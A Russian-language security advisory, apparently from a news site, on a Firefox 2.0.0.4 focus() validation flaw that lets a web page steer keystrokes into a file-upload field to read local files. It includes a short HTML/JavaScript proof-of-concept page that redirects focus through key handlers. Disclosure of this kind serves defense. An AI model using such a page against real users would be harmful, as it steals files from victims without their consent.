Программа: Mozilla Firefox 2.0.0.4

Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в функции focus(). Атакующий может без необходимости подтверждения перенаправить фокус с выделенных объектов на загрузку защищенного файла. Эксплуатирование уязвимости позволяет прочитать содержимое произвольных файлов на системе жертвы.

Пример:

<html>
<body>
<script>
function restore()
{
 document.getElementById("text1").value=document.getElementById("file1").value;
 document.getElementById("text1").focus();
}

function doKeyDown()
{
 document.getElementById("label1").focus();
}
</script>

<input type="file" id="file1" name="file1" onkeydown="restore();" onkeyup="restore()" />
<label for="file1" id="label1" name="label1"></label>
<br>
<textarea name="text1" id="text1" onkeydown="doKeyDown()">
</textarea>
</body>
</html>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии